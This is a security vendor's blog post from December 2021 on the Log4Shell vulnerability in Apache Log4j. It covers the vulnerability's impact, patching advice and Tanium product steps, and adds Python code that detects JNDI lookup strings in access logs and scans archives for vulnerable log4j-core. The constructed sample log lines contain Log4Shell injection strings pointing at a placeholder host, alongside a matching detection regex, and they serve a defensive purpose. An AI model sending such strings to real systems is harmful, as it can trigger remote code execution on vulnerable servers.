Dec 14, 2021
What is Log4j and How Do I Protect My Organization?
The zero-day vulnerability is about as bad as it gets, making prompt action essential
By Tanium Staff
The volume of software flaws published to the US National Vulnerability Database (NVD) in 2021 hit a record high just last week. But few, if any, have recorded a CVSS score of 10.0. Unfortunately, Apache has saved the worst till last after a new zero-day bug was discovered in its popular Log4j logging service late last week.
Threat actors reacted with characteristic agility and are already exploiting the vulnerability for various ends across many platforms. The impact is being felt across the world as security teams in technology vendors and enterprises alike scramble to find, fix or mitigate the issue.
Watch this short video to see how Tanium can help identify, investigate and remediate Log4Shell.
What is Log4j/Log4Shell?
Log4j is a popular open-source logging utility used by millions of Java applications. The underlying “improper input validation” flaw (CVE-2021-44228) has been dubbed “Log4Shell.” It can be exploited relatively easily to enable remote code execution on a compromised machine — by forcing a vulnerable app to log a specific string of characters. As applications log many different types of events, there are various ways to do this. For the Minecraft video game, it was apparently as easy as pasting a short message into a chatbox.
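Because the trigger is simply a logged string, the attacker-controlled fields that web servers write to their access logs (request line, Referer, User-Agent) are a natural place to look for exploitation attempts. The following first-pass detector is an added example for this post, not Tanium's code or anything from the Apache project. It assumes combined-format access logs; the log lines are constructed for the example and `scanner.invalid` is a reserved, non-resolving name.

```python
import re
from typing import Iterable, NamedTuple


class Hit(NamedTuple):
    line_no: int
    field: str
    source_ip: str
    lookup: str


# A Log4j lookup addressed to the JNDI interpolator, e.g. ${jndi:ldap://host/x}.
# Case-insensitive because Log4j resolves the lookup name that way. Real attempts
# are often obfuscated with nested lookups, so treat this as a first pass that
# complements maintained detection rules, not as a complete signature.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent".
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Client-supplied fields that commonly end up in application logs.
LOGGED_FIELDS = ("request", "referer", "ua")


def scan_access_log(lines: Iterable[str]) -> list[Hit]:
    """Return one Hit per JNDI lookup string found in a logged, client-supplied field."""
    hits: list[Hit] = []
    for line_no, line in enumerate(lines, start=1):
        m = ACCESS_LINE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format; a real pipeline would record and skip it
        for field in LOGGED_FIELDS:
            for lk in JNDI_LOOKUP.finditer(m.group(field)):
                hits.append(Hit(line_no, field, m.group("ip"), lk.group(0)))
    return hits


def sources_to_triage(hits: Iterable[Hit]) -> dict[str, int]:
    """Count hits per source IP so responders can prioritise follow-up."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h.source_ip] = counts.get(h.source_ip, 0) + 1
    return counts


# Constructed sample lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2021:08:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Dec/2021:08:14:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.invalid/a}"
198.51.100.7 - - [11/Dec/2021:08:14:07 +0000] "GET /?q=${JNDI:rmi://scanner.invalid/b} HTTP/1.1" 200 512 "-" "curl/7.79"
10.0.0.12 - - [11/Dec/2021:08:15:01 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG.splitlines())
    for h in found:
        print(f"line {h.line_no}: {h.field} from {h.source_ip}: {h.lookup}")
    print(sources_to_triage(found))
```

A hit in the access log shows that a string was sent, not that Log4j processed it; the follow-up is to check whether the receiving application logs that field through a vulnerable Log4j build, which is what the scanning steps later in the post are for.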
An updated version of the utility, 2.15.0, is available now. However, the difficulty for security teams may be in finding instances of Log4j across their entire environment, especially if they are hidden in dependencies.
What has been the impact so far?
Tech firms as diverse as Microsoft, Cisco, Apple, Oracle, VMware and Elastic are reported as being exposed to Log4Shell. Many are rushing to patch their environments and share advice with customers.
Reports suggest that attackers are scanning the internet en masse for vulnerable systems. Attacks have been detected exploiting the bug to install coin miners, expose Amazon Web Services (AWS) keys, and install Cobalt Strike for ransomware, among other things.
Tanium’s product security team investigated CVE-2021-44228 and found no instances where Tanium software is impacted by the vulnerability in log4j.
‘Tis the season for hackers
Chris Vaughan, EMEA vice president, technical account management at Tanium, says this vulnerability is the worst he’s seen in his career, in terms of how many people and organizations are affected and how severe the impact could be. He believes attackers will particularly target the eCommerce sector due to the amount of money that runs through these websites.
“The timing of this vulnerability emerging is terrible for these companies as they will now be making emergency changes to their IT environments at their busiest time of the year with Christmas approaching,” Vaughan explains. “To minimize the impact, they should follow the same advice that I would offer organizations from all sectors, which is to patch the vulnerability as soon as they can. They should start with external-facing parts of their IT infrastructure first, such as their website, before shifting their focus to internal systems.”
How can Tanium help?
Fortunately, Tanium offers the tools to find potentially vulnerable instances, wherever they are, identify signs of exploitation, and mitigate the issue. Here’s how:
Find vulnerable instances
- Use Tanium Interact with Tanium Index to identify Apache Log4j2 JAR files and their versions
- Use Tanium Reveal to run a quick search of JAR, EAR, and WAR files for use of the Log4j library
- Use Tanium Comply to build a vulnerability assessment for CVE-2021-44228
Identify signs of exploitation
- Use Tanium Threat Response to import the relevant YARA rules
- Alternatively, use Tanium Threat Response to search for vulnerable Log4j bundles by importing the relevant hashes
Mitigate or patch CVE-2021-44228
- Use Tanium Interact to build Tanium packages designed to mitigate the bug by:
  - Enabling the log4j2.formatMsgNoLookups system property (for Log4j versions 2.10 – 2.14.1)
  - Removing JndiLookup.class from the classpath (for Log4j versions 2.10 and older)
- Use Tanium Deploy to deliver updated versions of software you’ve identified as impacted in your environment
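The "find vulnerable instances" and "mitigate" steps above can be illustrated in plain code. The scanner below is an added example written for this post; it is not Tanium's tooling or the Apache project's code. It walks a directory for JAR, WAR and EAR files, recurses into archives nested inside them (the WEB-INF/lib case that hides dependencies), reads the log4j-core version from the `pom.properties` that Maven-built jars carry, checks for `JndiLookup.class`, and shows the class-removal mitigation by writing a copy of a jar without that entry. The two archive paths are the real locations inside log4j-core; the sample tree it builds is constructed, and the version threshold follows the post (releases older than 2.15.0 need action).

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

LOG4J_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED = (2, 15, 0)  # the updated release the post names
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(text: str):
    """Read 'version=2.14.1' from a pom.properties body -> (2, 14, 1); None if absent."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", text, re.MULTILINE)
    return tuple(int(x or 0) for x in m.groups()) if m else None


def inspect_archive(zf: zipfile.ZipFile, where: str, findings: list) -> None:
    """Record log4j-core evidence in zf and recurse into archives nested inside it."""
    names = set(zf.namelist())
    version = parse_version(zf.read(LOG4J_POM).decode()) if LOG4J_POM in names else None
    if version or JNDI_CLASS in names:
        findings.append({
            "location": where,
            "version": version,
            "jndi_lookup_present": JNDI_CLASS in names,
            # Unknown version + lookup class present is treated as needing action.
            "needs_action": JNDI_CLASS in names and (version is None or version < FIXED),
        })
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                inspect_archive(inner, f"{where}!{name}", findings)


def find_log4j(root) -> list:
    """Scan every JAR/WAR/EAR under root, including nested archives."""
    findings: list = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES and zipfile.is_zipfile(path):
            with zipfile.ZipFile(path) as zf:
                inspect_archive(zf, str(path), findings)
    return findings


def remove_jndi_lookup(jar_path, out_path) -> bool:
    """Write a copy of a top-level jar with JndiLookup.class dropped; True if it was present."""
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(out_path, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(info, src.read(info.filename))
    return removed


def build_sample_tree(root) -> None:
    """Constructed fixture: a log4j-core 2.14.1 jar, the same jar inside a WAR, and a clean jar."""
    root = Path(root)
    (root / "lib").mkdir(parents=True)
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as z:
        z.writestr(LOG4J_POM, "version=2.14.1\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class file
    (root / "lib" / "log4j-core-2.14.1.jar").write_bytes(core.getvalue())
    with zipfile.ZipFile(root / "app.war", "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
        war.writestr("WEB-INF/web.xml", "<web-app/>")
    with zipfile.ZipFile(root / "lib" / "other.jar", "w") as z:
        z.writestr("com/example/Main.class", b"\xca\xfe\xba\xbe")


def demo() -> dict:
    """Build the constructed tree, scan it, mitigate the top-level jar, and report."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        findings = find_log4j(tmp)
        jar = Path(tmp) / "lib" / "log4j-core-2.14.1.jar"
        fixed = Path(tmp) / "lib" / "log4j-core-2.14.1.mitigated.jar"
        removed = remove_jndi_lookup(jar, fixed)
        with zipfile.ZipFile(fixed) as zf:
            still_present = JNDI_CLASS in zf.namelist()
        return {
            "locations": sorted(f["location"].replace(tmp, "<root>") for f in findings if f["needs_action"]),
            "versions": sorted({f["version"] for f in findings}),
            "removed": removed,
            "still_present": still_present,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two caveats when running something like this for real. The version comes only from `pom.properties`, which a shaded or repackaged build may omit, so the class check is the more reliable signal; a build that relocates the package to another name is missed by both. And rewriting a vendor jar changes a deployed artifact, so record what was changed, rescan afterwards, and treat it as a stopgap until the updated release can be delivered through Tanium Deploy.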
The impact of Log4Shell on the threat landscape and global security teams is still unclear, although the repercussions could be long-lasting. But best practices remain the same. As always, mitigating critical risk in your IT environment starts with visibility and control.